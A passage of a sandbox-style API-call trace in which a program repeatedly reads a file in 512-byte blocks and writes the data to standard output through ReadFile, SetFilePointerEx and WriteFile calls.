nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.928] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.928] GetFileType (hFile=0x4c) returned 0x1 [0092.928] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.928] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.928] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.928] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.928] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.928] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.928] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.929] GetFileType (hFile=0x4c) returned 0x1 [0092.929] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.929] GetFileType (hFile=0x4c) returned 0x1 [0092.929] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.929] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.929] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.929] GetFileType (hFile=0x4c) returned 0x1 [0092.929] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.929] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.929] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.929] GetFileType (hFile=0x4c) returned 0x1 [0092.929] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.929] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.929] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.929] GetFileType (hFile=0x4c) returned 0x1 [0092.929] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.929] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.929] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.929] GetFileType (hFile=0x4c) returned 0x1 [0092.929] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.929] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.929] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.929] GetFileType (hFile=0x4c) returned 0x1 [0092.929] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.929] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.929] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.929] GetFileType (hFile=0x4c) returned 0x1 [0092.929] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.929] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.929] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.929] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.929] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.929] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.929] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.929] GetFileType (hFile=0x4c) returned 0x1 [0092.929] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.930] GetFileType (hFile=0x4c) returned 0x1 [0092.930] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.930] WriteFile (in: hFile=0x4c, lpBuffer=0x16f2ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.930] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.930] GetFileType (hFile=0x4c) returned 0x1 [0092.930] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.930] WriteFile (in: hFile=0x4c, lpBuffer=0x16f33c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f33c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.930] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.930] GetFileType (hFile=0x4c) returned 0x1 [0092.930] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.930] WriteFile (in: hFile=0x4c, lpBuffer=0x16f38c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f38c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.930] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.930] GetFileType (hFile=0x4c) returned 0x1 [0092.930] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.930] WriteFile (in: hFile=0x4c, lpBuffer=0x16f3dc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f3dc*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.930] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.930] GetFileType (hFile=0x4c) returned 0x1 [0092.930] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.930] WriteFile (in: hFile=0x4c, lpBuffer=0x16f42c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f42c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.930] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.930] GetFileType (hFile=0x4c) returned 0x1 [0092.930] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.930] WriteFile (in: hFile=0x4c, lpBuffer=0x16f47c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f47c*, lpNumberOfBytesWritten=0x16e4d0*=0x50, lpOverlapped=0x0) returned 1 [0092.930] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.930] GetFileType (hFile=0x4c) returned 0x1 [0092.930] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.930] WriteFile (in: hFile=0x4c, lpBuffer=0x16f4cc*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x16e4d0, lpOverlapped=0x0 | out: lpBuffer=0x16f4cc*, lpNumberOfBytesWritten=0x16e4d0*=0x20, lpOverlapped=0x0) returned 1 [0092.930] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.930] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.930] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.930] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.930] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.930] GetFileType (hFile=0x4c) returned 0x1 [0092.931] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.931] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.931] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.931] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.931] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.931] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.931] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.931] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.931] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.931] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.931] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.931] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.931] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.931] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.931] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.931] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.931] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.931] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.931] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.931] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.931] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.931] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.932] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.932] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.932] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.932] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.932] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.932] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.932] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.932] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.932] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.932] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.932] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.932] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.932] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.932] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.932] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.932] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.932] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.932] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.932] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.932] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.932] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.932] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.932] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.933] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.933] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.933] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.933] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.933] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.933] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.933] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.933] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.933] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.933] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.933] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.933] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.933] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.933] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.933] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.933] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.933] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.933] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.933] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.933] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.933] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.933] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.933] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.934] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.934] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.934] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.934] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.934] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.934] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.934] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.934] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.934] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.934] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.934] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.934] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.934] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.934] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.934] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.934] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.934] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.934] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.934] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.934] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.934] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.934] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.934] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.935] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.935] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.935] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.935] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.935] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.935] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.935] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.935] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.935] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.935] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.935] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.935] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.935] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.935] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.935] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.935] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.935] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.935] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.935] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.935] ReadFile (in: hFile=0x54, lpBuffer=0x16f2ec, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x16e4dc, lpOverlapped=0x0 | out: lpBuffer=0x16f2ec*, lpNumberOfBytesRead=0x16e4dc*=0x200, lpOverlapped=0x0) returned 1 [0092.935] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x16e4bc | out: lpNewFilePointer=0x0) returned 1 [0092.935] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.935] 